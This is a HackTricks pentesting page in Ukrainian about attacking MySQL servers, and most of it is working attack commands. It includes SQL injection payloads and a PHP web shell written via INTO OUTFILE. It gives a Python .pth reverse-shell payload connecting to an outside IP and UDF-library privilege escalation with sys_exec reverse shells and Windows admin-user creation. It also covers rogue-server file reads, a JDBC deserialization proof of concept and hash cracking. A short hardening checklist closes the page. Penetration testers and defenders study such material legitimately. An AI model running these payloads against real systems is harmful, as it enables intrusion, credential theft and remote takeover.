3306 - Pentesting Mysql

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

Базова інформація

MySQL можна описати як систему управління реляційними базами даних Relational Database Management System (RDBMS) з відкритим вихідним кодом, яка доступна безкоштовно. Вона працює на базі Structured Query Language (SQL), що дозволяє керувати й маніпулювати базами даних.

Порт за замовчуванням: 3306

3306/tcp open  mysql

Підключення

Локально

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Віддалено

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Зовнішня Enumeration

Деякі з enumeration дій вимагають дійсних облікових даних

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Записати будь-які бінарні дані

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL команди

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL Перерахування дозволів

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

У документації можна переглянути значення кожної привілеї: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python .pth RCE (гачки конфігурацій, специфічні для сайту)

Зловживаючи класичним примітивом INTO OUTFILE, можна отримати виконання довільного коду на цілях, які пізніше запускають Python скрипти.

1. Використайте INTO OUTFILE, щоб скинути кастомний .pth файл у будь-який каталог, який автоматично завантажується site.py (наприклад .../lib/python3.10/site-packages/).
2. Файл .pth може містити один рядок, що починається з import і супроводжується довільним Python-кодом, який виконуватиметься щоразу при запуску інтерпретатора.
3. Коли інтерпретатор неявно запускається CGI-скриптом (наприклад /cgi-bin/ml-draw.py із shebang #!/bin/python), payload виконується з тими ж привілеями, що й процес веб-сервера (FortiWeb запускав це як root → повний pre-auth RCE).

Example .pth payload (single line, no spaces can be included in the final SQL payload, so hex/UNHEX() or string concatenation may be required):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Приклад створення файлу за допомогою UNION запиту (символи пробілу замінені на /**/, щоб обійти фільтр пробілів sscanf("%128s") і зберегти загальну довжину ≤128 байт):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Важливі обмеження та обхідні шляхи:

• INTO OUTFILE не може перезаписати існуючі файли; виберіть нове ім’я файлу.
• Шлях файлу визначається відносно MySQL’s CWD, тому префікс ../../ допомагає скоротити шлях і обійти обмеження на абсолютні шляхи.
• Якщо ввід атакуючого витягується за допомогою %128s (або подібного), будь-який пробіл обрізатиме payload; використовуйте послідовності коментарів MySQL /**/ або /*!*/ для заміни пробілів.
• Користувачу MySQL, що виконує запит, потрібен привілей FILE, але в багатьох пристроях (наприклад, FortiWeb) сервіс працює від імені root, що дає можливість запису майже скрізь.

Після розміщення .pth просто зверніться до будь-якого CGI, який обробляє інтерпретатор python, щоб отримати виконання коду:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

Процес Python автоматично імпортує зловмисний .pth і виконає shell payload.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL arbitrary read file by client

Насправді, коли ви намагаєтеся load data local into a table, MySQL або MariaDB сервер просить вміст файлу, щоб клієнт прочитав його і надіслав. Тому, якщо ви можете підробити mysql client, щоб він підключився до вашого MySQL сервера, ви можете прочитати довільні файли.
Зверніть увагу, що це поведінка при використанні:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Зверніть увагу на слово “local”)
Тому без “local” ви можете отримати:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Початковий PoC: https://github.com/allyshka/Rogue-MySql-Server
У цій статті ви можете знайти повний опис атаки та навіть інструкцію, як розширити її до RCE: https://paper.seebug.org/1113/
Тут ви можете знайти огляд атаки: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/\

POST

Mysql Користувач

Буде дуже цікаво, якщо mysql запущено як root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Небезпечні параметри mysqld.cnf

У конфігурації служб MySQL використовуються різні налаштування для визначення його роботи та заходів безпеки:

• Налаштування user використовується для вказівки користувача, під яким буде запущено службу MySQL.
• password використовується для встановлення пароля, пов’язаного з користувачем MySQL.
• admin_address вказує IP-адресу, яка прослуховує TCP/IP-з’єднання на адміністративному мережевому інтерфейсі.
• Змінна debug вказує на поточні параметри налагодження, що можуть містити чутливу інформацію в логах.
• sql_warnings керує тим, чи генеруються інформаційні рядки для одно-рядкових INSERT-запитів при виникненні попереджень, які можуть містити чутливі дані в логах.
• За допомогою secure_file_priv область операцій імпорту та експорту даних обмежується для підвищення безпеки.

Local Linux enumeration

If you already have shell access on the host, the fastest wins are usually local sockets, client credential files, and auth plugins mapping an OS user into a DB account.

High-signal paths and artifacts:

ls -l /run/mysqld/mysqld.sock /var/run/mysqld/mysqld.sock 2>/dev/null
ls -l /etc/mysql/debian.cnf ~/.my.cnf ~/.mylogin.cnf 2>/dev/null
grep -RNI -E '^(bind-address|skip-networking|socket)\\b' /etc/mysql /etc/my.cnf* 2>/dev/null

Якщо локальний сокет доступний, перевірте користувачів/плагіни та ефективну ідентичність:

mysql -S /run/mysqld/mysqld.sock -u root -e \
"SELECT user,host,plugin,account_locked FROM mysql.user;" 2>/dev/null
mysql -S /run/mysqld/mysqld.sock -u root -e \
"SELECT USER(),CURRENT_USER();" 2>/dev/null

На що звернути увагу:

• auth_socket / unix_socket для привілейованих користувачів: OS-користувач може стати DB-користувачем через локальний сокет без DB-пароля
• файли /etc/mysql/debian.cnf або ~/.my.cnf, доступні для читання
• secure_file_priv порожній або вказує на директорію, доступну для запису
• local_infile увімкнено, коли це не потрібно

Швидкі перевірки:

mysql -S /run/mysqld/mysqld.sock -u root -e "
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'local_infile';
SHOW GRANTS FOR CURRENT_USER();
" 2>/dev/null

Підвищення привілеїв

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation via library

Якщо mysql server is running as root (або іншим користувачем з вищими правами), ви можете змусити його виконувати команди. Для цього потрібно використовувати user defined functions. А для створення user defined функції вам знадобиться library для OS, на якій працює mysql.

Зловмисну бібліотеку можна знайти всередині sqlmap та metasploit, виконавши locate "*lib_mysqludf_sys*". Файли .so — це бібліотеки linux, а .dll — для Windows, оберіть потрібну.

Якщо у вас немає цих бібліотек, ви можете або пошукати їх, або завантажити цей linux C code і скомпілювати його всередині вразливої linux-машини:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Тепер, коли у вас є бібліотека, увійдіть у Mysql як привілейований користувач (root?) і виконайте наступні кроки:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Порада для Windows: створення директорій з NTFS ADS через SQL

На NTFS ви можете примусово створити каталог, використовуючи alternate data stream (ADS), навіть якщо доступний лише примітив запису файлу. Якщо класичний UDF chain очікує директорію plugin, але вона не існує, а @@plugin_dir невідомий або заблокований, ви можете спочатку створити її за допомогою ::$INDEX_ALLOCATION:

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

Це перетворює обмежений SELECT ... INTO OUTFILE на більш повний примітив на Windows stacks, ініціалізуючи потрібну структуру папок для UDF drops.

Отримання облікових даних MySQL з файлів

У файлі /etc/mysql/debian.cnf можна знайти пароль у відкритому вигляді для користувача debian-sys-maint

cat /etc/mysql/debian.cnf

Ви можете використати ці credentials щоб login in the mysql database.

У файлі: /var/lib/mysql/mysql/user.MYD ви можете знайти всі hashes користувачів MySQL (ті, які можна витягти з mysql.user всередині бази даних).

Ви можете витягти їх, виконавши:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Увімкнення логування

Ви можете увімкнути логування запитів mysql у файлі /etc/mysql/my.cnf, розкоментувавши наступні рядки:

Корисні файли

Configuration Files

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Command History
• ~/.mysql.history
• Log Files
• connections.log
• update.log
• common.log

Бази даних/таблиці MySQL за замовчуванням

Автоматичні команди HackTricks

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

Основні моменти 2023–2025 (нове)

JDBC propertiesTransform deserialization (CVE-2023-21971)

From Connector/J <= 8.0.32 an attacker who can influence the JDBC URL (for instance in third-party software that asks for a connection string) can request arbitrary classes to be loaded on the client side via the propertiesTransform parameter. If a gadget present on the class-path is loadable this results in remote code execution in the context of the JDBC client (pre-auth, because no valid credentials are required). Мінімальний PoC виглядає так:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Запуск Evil.class може бути таким же простим, як розміщення його на class-path вразливої програми або дозволити rogue MySQL server надіслати шкідливий serialized object. Проблему виправлено в Connector/J 8.0.33 — оновіть драйвер або явно встановіть propertiesTransform у allow-list. (Див. Snyk write-up для деталей)

Rogue / Fake MySQL server атаки проти JDBC клієнтів

Декілька open-source інструментів реалізують partial протокол MySQL з метою атакувати JDBC клієнтів, які встановлюють підключення назовні:

• mysql-fake-server (Java, supports file read and deserialization exploits)
• rogue_mysql_server (Python, similar capabilities)

Типові шляхи атаки:

1. Вразлива програма завантажує mysql-connector-j з allowLoadLocalInfile=true або autoDeserialize=true.
2. Атакуючий контролює DNS / host entry, тому hostname БД вказує на машину під його контролем.
3. Зловмисний сервер відповідає сформованими пакетами, які викликають або LOCAL INFILE довільне читання файлу, або Java deserialization → RCE.

Приклад однорядкового запуску фейкового сервера (Java):

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Потім вкажіть цільовий додаток на jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true і прочитайте /etc/passwd, закодувавши ім’я файлу в base64 у полі username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Cracking caching_sha2_password hashes

MySQL ≥ 8.0 зберігає password hashes як $mysql-sha2$ (SHA-256). Both Hashcat (mode 21100) and John-the-Ripper (--format=mysql-sha2) підтримують offline cracking з 2023 року. Здампте колонку authentication_string і подайте її напряму:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Контрольний список для посилення безпеки (2025)

• Встановіть LOCAL_INFILE=0 та --secure-file-priv=/var/empty щоб нейтралізувати більшість примітивів читання/запису файлів. • Видаліть привілей FILE з облікових записів застосунків. • У Connector/J встановіть allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (порожньо). • Вимкніть невикористовувані плагіни автентифікації та вимагайте TLS (require_secure_transport = ON). • Стежте за CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL та раптовими SET GLOBAL інструкціями.

Джерела

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• The Art of PHP: CTF‑born exploits and techniques

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.